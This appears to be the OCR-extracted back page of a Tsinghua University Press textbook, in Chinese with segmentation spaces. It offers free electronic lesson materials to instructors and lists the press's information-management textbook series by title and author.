为 了 配合 本 课程 的 教学 需要 ， 本 教材 配 有 配套 的 电子 教案 (素材 )， 有 需求 的 教师 可 
以 与 我 们 联系 , 我 们 将 向 使 用 本 教材 进行 教学 的 教师 免费 赠送 电子 教案 (素材 ), 希望 有 
助 于 教学 活动 的 开展 。 相 关 信 息 请 拨打 电话 010-62776969 或 发 送 电子 邮件 至 
jsijc@tup.tsinghua.edu.cn 咨询 ， 也 可 以 到 清华 大 学 出 版 社 主 页 (http://www.tup.com.cn 或 
http://www.tup.tsinghua.edu.cn) 上 查询 。 


高 等 院 校 信息 管理 与 信息 系统 专业 系列 教材 


信息 资源 管理 教程 ” 赖 茂生 编著 

数据 仓库 与 数据 挖掘 教程 ” 陈 文 伟 编著 
计算 机 操作 系统 教程 ” 张 不 同等 编著 
计算 机 网 络 教程 ” 黄 叔 武 等 编著 

计算 机 网 络 教程 题解 与 实验 指导 ” 黄 叔 武 等 编著 
信息 系统 开发 与 管理 教程 (第 二 版 ) 左 美 云 编著 
信息 系统 开发 方法 教程 (第 二 版 ) 陈 佳 等 编著 
决策 支持 系统 教程 ” 陈 文 伟 编著 
离散 数学 (第 三 版 ) 耿 素 云 等 编著 
离散 数学 题解 (修订 版 ) 届 婉 玲 等 编著 

计算 机 组 成 原理 教程 (第 3 版 ) 张 基 温 编著 
计算 机 组 成 原理 教程 题解 与 实验 指导 张 基 温 编著 
信息 管理 英语 教程 ” 李 季 方 编著 

管理 信息 系统 教程 (第 二 版 ) 内 四 清 编著 

电子 商务 基础 教程 (第 二 版 ) 兰 宜生 编著 

Java 程序 开发 教程 ” 张 基 温 编著 

Java 程序 开发 例题 与 题解 ” 张 基 温 编著 

Visual Basic 程序 开发 教程 ” 张 基 温 编著 

Visual Basic 程序 开发 例题 与 题解 ” 张 基 温 编著 
数据 结构 及 应 用 算法 教程 ” 严 蔚 敏 等 编著 
运筹 学 模型 与 方法 教程 ” 程 理 民 等 编著 

运筹 学 模型 与 方法 教程 例题 分 析 与 题解 ” 刘 满 凤 等 编著 
数据 库 系统 原理 教程 王 珊 等 编著 
信息 经 济 学 教程 ” 陈 各 编著 

C++ 程序 开发 教程 ” 张 基 温 编著 

C++ 程序 开发 例题 与 习题 ” 张 基 温 编著 

信息 系统 安全 教程 ” 张 基 温 编著 


